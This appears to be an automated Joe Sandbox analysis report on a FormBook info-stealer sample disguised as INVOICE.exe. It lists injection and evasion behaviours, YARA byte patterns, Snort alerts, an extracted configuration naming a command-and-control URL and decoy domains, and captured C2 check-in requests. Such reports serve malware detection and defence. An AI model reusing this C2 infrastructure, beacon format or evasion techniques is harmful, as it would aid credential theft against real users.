Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INVOICE.exe

Overview

General Information

Sample Name:INVOICE.exe
Analysis ID:433143
MD5:98901aff995d92677cf637b241ae9a9b
SHA1:6dac1968c4a9ae4bf26f7fd38efb721fcf7d05dc
SHA256:fb6e849cd3af7e8b0c8143397e62a595a42abbfbbac81f2cdd0b2cb4d18ea543
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INVOICE.exe (PID: 6440 cmdline: 'C:\Users\user\Desktop\INVOICE.exe' MD5: 98901AFF995D92677CF637B241AE9A9B)
    • INVOICE.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\INVOICE.exe' MD5: 98901AFF995D92677CF637B241AE9A9B)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • systray.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
        • cmd.exe (PID: 2100 cmdline: /c del 'C:\Users\user\Desktop\INVOICE.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gicc-fx.com/uer0/"], "decoy": ["bonds101.com", "lyotrust.com", "can-amchainseurope.com", "mysoulcure.com", "hometownsmut.com", "cxpzhy.site", "hjklrmn.xyz", "bsdminingservice.com", "mockpacket.com", "standwithkam.com", "yxbdj.com", "soulseedz.com", "whxldjt.com", "ruayhunhangseng.com", "benefitcrystal.info", "rahalake.com", "cryptnex.com", "comicslighthouse.com", "ridenwithbiden.net", "samsunbilsem.com", "homestorestoragemanhattan.com", "33-today.club", "laurajimore.com", "wellnesswithshami.com", "palmyra-beaute.com", "ringerpinger.com", "cpf3life.com", "medusaantalya.com", "meganmccalla.com", "xn--2qux23coval6o.net", "icheaplivemall.com", "theseekers5thdimension.com", "hydrogenfunding.com", "calphad.cloud", "amazingdiapercakes.com", "11gongli.com", "bhuyanit.com", "16263937888.com", "crowgangrecords.com", "ytub.xyz", "virtual-ledlight.com", "dollysusmitha.com", "istanbulkonyasofrasi.com", "phonetomouth.com", "tiendasred.com", "destemidovapes.com", "quinnmonroe.com", "internationaldatingapps.com", "aib-confirm.com", "rentthemansion.com", "musicmysoul.com", "alpinesocks.net", "8425sentinaechasedrive.com", "danielabigalli.com", "atlasresearchus.com", "rossinkmobilenotary.com", "mynevve.com", "alfacapital.fund", "jumtix.xyz", "rr-program.com", "trumpoutnowhat.com", "motorworld.rentals", "condoproinsurance.com", "quantumkca.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.INVOICE.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.INVOICE.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.INVOICE.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.1.INVOICE.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.INVOICE.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.gicc-fx.com/uer0/"], "decoy": ["bonds101.com", "lyotrust.com", "can-amchainseurope.com", "mysoulcure.com", "hometownsmut.com", "cxpzhy.site", "hjklrmn.xyz", "bsdminingservice.com", "mockpacket.com", "standwithkam.com", "yxbdj.com", "soulseedz.com", "whxldjt.com", "ruayhunhangseng.com", "benefitcrystal.info", "rahalake.com", "cryptnex.com", "comicslighthouse.com", "ridenwithbiden.net", "samsunbilsem.com", "homestorestoragemanhattan.com", "33-today.club", "laurajimore.com", "wellnesswithshami.com", "palmyra-beaute.com", "ringerpinger.com", "cpf3life.com", "medusaantalya.com", "meganmccalla.com", "xn--2qux23coval6o.net", "icheaplivemall.com", "theseekers5thdimension.com", "hydrogenfunding.com", "calphad.cloud", "amazingdiapercakes.com", "11gongli.com", "bhuyanit.com", "16263937888.com", "crowgangrecords.com", "ytub.xyz", "virtual-ledlight.com", "dollysusmitha.com", "istanbulkonyasofrasi.com", "phonetomouth.com", "tiendasred.com", "destemidovapes.com", "quinnmonroe.com", "internationaldatingapps.com", "aib-confirm.com", "rentthemansion.com", "musicmysoul.com", "alpinesocks.net", "8425sentinaechasedrive.com", "danielabigalli.com", "atlasresearchus.com", "rossinkmobilenotary.com", "mynevve.com", "alfacapital.fund", "jumtix.xyz", "rr-program.com", "trumpoutnowhat.com", "motorworld.rentals", "condoproinsurance.com", "quantumkca.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: INVOICE.exeReversingLabs: Detection: 65%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: INVOICE.exeJoe Sandbox ML: detected
          Source: 0.2.INVOICE.exe.9990000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.INVOICE.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.INVOICE.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.systray.exe.4ccf834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 8.2.systray.exe.ac3748.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: INVOICE.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: systray.pdb source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: INVOICE.exe, 00000001.00000002.275736052.00000000007D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INVOICE.exe, 00000000.00000003.198125696.00000000099C0000.00000004.00000001.sdmp, INVOICE.exe, 00000001.00000002.275776991.0000000000A80000.00000040.00000001.sdmp, systray.exe, 00000008.00000002.463792021.00000000047A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INVOICE.exe, systray.exe
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_0040263E FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 104.21.29.70:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 104.21.29.70:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 104.21.29.70:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.gicc-fx.com/uer0/
          Source: global trafficHTTP traffic detected: GET /uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz HTTP/1.1Host: www.cpf3life.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI HTTP/1.1Host: www.phonetomouth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz HTTP/1.1Host: www.cpf3life.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI HTTP/1.1Host: www.phonetomouth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.dollysusmitha.com
          Source: explorer.exe, 00000003.00000000.218929879.00000000089F9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: INVOICE.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: INVOICE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INVOICE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INVOICE.exe.9990000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.INVOICE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INVOICE.exe.9990000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: INVOICE.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: INVOICE.exe
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041A050 NtClose,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00419F20 NtCreateFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00419FD0 NtReadFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_0041A0FA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00419F1A NtCreateFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00419FCC NtReadFile,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,
